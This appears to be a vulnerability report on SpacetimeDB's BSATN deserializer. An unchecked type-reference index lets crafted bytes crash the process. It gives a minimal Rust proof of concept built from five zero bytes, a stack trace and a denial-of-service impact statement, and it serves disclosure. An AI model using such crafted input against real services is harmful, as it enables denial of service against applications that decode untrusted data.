Panic in BSATN Deserializer via Invalid Type Reference

[AkshayJainG]

AlgebraicTypeRef is a u32 index read directly from input. When resolving type references, no bounds check is performed before indexing into the Typespace.

use spacetimedb_sats::{bsatn, AlgebraicType, AlgebraicValue};

  fn main() {
      // BSATN-encoded AlgebraicType::Ref(0)
      let type_bytes: &[u8] = &[0x00, 0x00, 0x00, 0x00, 0x00];
      let ty: AlgebraicType = bsatn::from_slice(type_bytes).unwrap();

      // Panics: "index out of bounds: the len is 0 but the index is 0"
      let _ = AlgebraicValue::decode(&ty, &mut &[0u8; 8][..]);
  }

Stack Trace

0: rust_begin_unwind
1: core::panicking::panic_fmt
2: core::panicking::panic_bounds_check
3: <spacetimedb_sats::typespace::Typespace as core::ops::index::Index>::index
4: spacetimedb_sats::de::impls::<impl DeserializeSeed for WithTypespace>::deserialize

Impact

• Denial of Service if any code path deserializes AlgebraicType from untrusted input